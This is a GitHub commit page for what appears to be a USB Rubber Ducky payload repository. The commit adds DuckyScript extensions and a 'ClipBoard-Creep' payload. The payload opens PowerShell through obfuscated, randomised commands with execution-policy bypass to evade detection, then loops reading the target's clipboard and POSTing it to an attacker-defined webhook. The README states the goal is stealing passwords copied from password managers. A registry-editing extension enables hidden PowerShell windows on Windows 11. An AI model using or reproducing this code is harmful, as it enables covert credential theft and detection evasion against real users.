Skip to content

Commit

Permalink
Merge pull request #343 from 0iphor13/master
Browse files Browse the repository at this point in the history 
Uploaded ClipBoard-Creep & Extensions: Detect_Finished; Windows11_Console_Downgrade
  • Loading branch information
@dallaswinger
dallaswinger committed Jul 21, 2023
2 parents 32f9976 + 42fb5a2 commit 95aab56
Show file tree
Hide file tree
Showing 8 changed files with 294 additions and 0 deletions.
31 changes: 31 additions & 0 deletions payloads/extensions/community/Detect_Finished
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0iphor13

REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM

REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
35 changes: 35 additions & 0 deletions payloads/extensions/community/Windows11_Console_Downgrade
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
EXTENSION Windows11_Console_Downgrade
REM_BLOCK
Version: 1.0
Author: 0iphor13
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM

REM CONFIGURATION:
REM Used to wait until initial execution
DEFINE #INPUT_WAIT 2000
REM GUID for using the legacy console host for terminal execution
DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D

FUNCTION Console_Downgrade()
DELAY #INPUT_WAIT
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI
DELAY 1000
STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";
STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit
END_FUNCTION

REM_BLOCK
EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.
Console_Downgrade()
DELAY 2000
GUI r
DELAY 2000
STRINGLN powershell -w h
DELAY 1500
STRINGLN calc.exe;exit
END_REM
END_EXTENSION
0 ...ions/community/windows_elevated_execution → ...ions/community/Windows_Elevated_Execution
View file
File renamed without changes.
17 changes: 17 additions & 0 deletions payloads/library/exfiltration/ClipBoard-Creep/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
# Clipboard-Creep #
Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general.


## Usage ##
### #HOOK ###
Define your webhook under #HOOK

![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)

### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.

![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)

After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
Binary file added payloads/library/exfiltration/ClipBoard-Creep/media/callback.png
View file
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png
View file
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added payloads/library/exfiltration/ClipBoard-Creep/media/hook.png
View file
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
211 changes: 211 additions & 0 deletions payloads/library/exfiltration/ClipBoard-Creep/payload.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,211 @@
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep


EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.

REM CONFIGURATION:
REM Add ExecutionPolicy bypass
DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 500

$_RANDOM_MIN = 1
$_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H
END_IF


IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs
ELSE
STRING -eP BYPaSs
END_IF
END_IF_DEFINED
ENTER
DELAY #DELAY
END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000
REM GUI r
REM DELAY 2000
REM Rolling_Powershell_Execution()
END_EXTENSION

EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0iphor13

REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM

REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION


REM Define URL of your catching webhook
DEFINE #HOOK "https://example.com/"
REM Define the pause between calls to your webhook.
DEFINE #CALLBACK_DELAY 12

IF ($_OS == WINDOWS) THEN
GUI r
DELAY 1000
REM randomized and obfuscated way to start powershell
Rolling_Powershell_Execution()
STRINGLN_POWERSHELL
$e = $null
while ($true)
{
$c = Get-Clipboard
if ($c)
{
if ($c -ne $e)
{
$o = "Clipboard content: $c"
irm -Uri #HOOK -Method POST -Body $o
} else
{
$o = "Clipboard content hasn't changed"
irm -Uri #HOOK -Method POST -Body $o
}
$e = $c
} else
{
$o = "Clipboard is empty"
irm -Uri #HOOK -Method POST -Body $o
}
sleep -s #CALLBACK_DELAY
}
END_STRINGLN
ENTER
DELAY 250
Detect_Finished()
ELSE
ATTACKMODE OFF
END_IF





0 comments on commit 95aab56

Please sign in to comment.